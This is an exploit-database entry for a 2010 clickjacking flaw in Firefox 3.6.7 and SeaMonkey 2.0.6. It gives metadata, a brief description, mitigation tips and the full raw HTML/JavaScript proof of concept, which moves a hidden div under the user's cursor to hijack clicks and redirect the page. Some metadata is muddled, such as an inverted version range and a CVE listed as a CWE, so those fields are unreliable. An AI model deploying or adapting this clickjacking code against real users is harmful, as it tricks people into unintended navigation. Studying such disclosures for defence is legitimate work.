header-logo
Suggest Exploit
vendor:
Firefox
by:
Pouya Daneshmand
7,5
CVSS
HIGH
ClickJacking
693
CWE
Product Name: Firefox
Affected Version From: 3.6.7
Affected Version To: 2.0.6
Patch Exists: YES
Related CWE: CVE-2010-3765
CPE: a:mozilla:firefox
Metasploit: https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2010-3765/https://www.rapid7.com/db/vulnerabilities/freebsd-vid-c223b00d-e272-11df-8e32-000f20797ede/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2010-3765/https://www.rapid7.com/db/vulnerabilities/mozilla-thunderbird-cve-2010-3765/https://www.rapid7.com/db/vulnerabilities/mfsa2010-73-cve-2010-3765/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0808/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0809/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0810/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0896/https://www.rapid7.com/db/vulnerabilities/suse-cve-2010-3765/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0812/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0861/https://www.rapid7.com/db/vulnerabilities/mozilla-seamonkey-cve-2010-3765/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2010

FF3.6.7/SM 2.0.6 ClickJacking Vulnerability

A clickjacking vulnerability exists in Firefox 3.6.7 and SeaMonkey 2.0.6. An attacker can use this vulnerability to trick a user into clicking on a malicious link by hiding it behind a legitimate link. This can be done by using a transparent layer over the legitimate link and making it appear as if the user is clicking on the legitimate link.

Mitigation:

Users should be aware of the potential for clickjacking attacks and should not click on links that appear suspicious. Additionally, users should ensure that their browser is up to date with the latest security patches.
Source

Exploit-DB raw data:

<html><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<title>FF3.6.7/SM 2.0.6 ClickJacking Vulnerability</title>
</head><body>

<div id="mydiv" onmouseover="document.location='http://www.mozilla.org';" style="border: 0px none ; background: rgb(0, 0, 0) none repeat scroll 0% 0%; position: absolute; width: 2px; height: 2px; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"></div>
<script>
function clickjack_armor(evt)
{
	clickjack_mouseX=evt.pageX?evt.pageX:evt.clientX;
	clickjack_mouseY=evt.pageY?evt.pageY:evt.clientY;
	document.getElementById('mydiv').style.left=clickjack_mouseX-1;
	document.getElementById('mydiv').style.top=clickjack_mouseY-1;
}
</script>
<center>
<br>
<center><h1><font face="Calibri">Firefox 3.6.7 / SeaMonkey 2.0.6 Clickjacking Vulnerability</font></h1>
 <p> </p>
<div style="border-top-style: solid; border-top-width: 1px; padding-top: 1px">
	<b><br><br>

	<a href="http://www.Securitylab.ir" onclick="clickjack_armor(event)"> Go 
	to the http://www.Securitylab.ir : (http://www.mozilla.org)</a></b></div>
<div style="border-bottom-style: solid; border-bottom-width: 1px; padding-bottom: 1px">
 <p> </div>
<p> </p>
</center>
<div style="border-top-style: solid; border-top-width: 1px; border-bottom-style: solid; border-bottom-width: 1px; padding-top: 1px; padding-bottom: 1px">
	<b><font face="Calibri">Pouya Daneshmand, Securitylab.ir</font></b></div>

</center></body></html>

Navigation

Suggest Exploit

Services By CQR